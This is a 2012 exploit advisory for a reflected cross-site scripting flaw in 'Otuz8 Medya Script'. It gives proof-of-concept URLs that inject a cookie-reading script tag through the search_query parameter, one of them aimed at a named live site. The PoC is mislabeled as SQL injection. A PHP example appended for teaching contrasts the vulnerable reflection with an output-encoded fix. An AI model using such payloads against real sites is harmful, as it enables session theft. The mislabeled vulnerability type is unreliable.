*# Exploit Title: Otuz8 Medya Script Cross Site Scripting
# Date: 25.03.2012
# Author: V4rcyion ( ( GrayMAN ) Fırat TEMEL )
# Email: v4rcyion@hotmail.com.tr
# Script url: http://toptanoje.com/
# Version: N/A
# CVE : ()
=======================Exploit====================================
---GrayHatz ( Bug Researchers ) ---
[ EXPL0!T ]
SQL Injection
p0c -
http://toptanoje.com/search.php?orderby=position&orderway=desc&search_query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
[XSS]
p0c -
http://site.com/search.php?orderby=position&orderway=desc&search_query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
[Note: XSS Tested.]
===========================================================================
Greetz to : Required ( Başkan), Thorium, CaCa, TheMad, TechnicaL, Türkeşhan
( Kirve ), Bronx, Barbarossa, JiHAD, 3spi0N, El Azap
All members of GrayHatz,
Special Greetz to : Required, CaCa, TheMad
=== END ( GrayMAN ) ====*
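
Added example (not part of the original advisory and not the vendor's code): a hypothetical search.php fragment showing the unescaped reflection that the search_query payload above implies, next to an output-encoded version. Only the parameter names and the values "position" and "desc" come from the advisory; the function names, the form markup and the other allowlist values are assumptions.

```php
<?php
// Hypothetical reconstruction: the advisory does not show search.php's source.
// Only the parameter names (search_query, orderby, orderway) come from the page.

// Read one query parameter as a string; arrays (search_query[]=x) become ''.
function param(array $query, string $name): string
{
    $v = $query[$name] ?? '';
    return is_string($v) ? $v : '';
}

// BEFORE (assumed pattern): the raw value lands inside a double-quoted
// attribute, so a leading "> closes the tag and the rest is parsed as markup.
function render_search_box_unsafe(array $query): string
{
    return '<input type="text" name="search_query" value="' . param($query, 'search_query') . '">';
}

// Encode for HTML text and quoted-attribute contexts.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// AFTER: encode on output and constrain the sort parameters to an allowlist.
function render_search_box(array $query): string
{
    $q = param($query, 'search_query');
    // Allowed values other than "position" and "desc" are assumptions.
    $orderby = in_array(param($query, 'orderby'), ['position', 'name', 'price'], true)
        ? param($query, 'orderby') : 'position';
    $orderway = param($query, 'orderway') === 'asc' ? 'asc' : 'desc';

    return '<form action="search.php" method="get">'
        . '<input type="hidden" name="orderby" value="' . h($orderby) . '">'
        . '<input type="hidden" name="orderway" value="' . h($orderway) . '">'
        . '<input type="text" name="search_query" value="' . h($q) . '">'
        . '</form>';
}

// Constructed input: the URL-decoded search_query value from the advisory's URL.
$query = ['orderby' => 'position', 'orderway' => 'desc',
          'search_query' => '"><script>alert(document.cookie)</script>'];

echo render_search_box_unsafe($query), PHP_EOL; // value="" is closed early, <script> becomes markup
echo render_search_box($query), PHP_EOL;        // payload stays inside value="" as inert text
```

Marking the session cookie HttpOnly additionally keeps it out of document.cookie, which is what the advisory's payload reads.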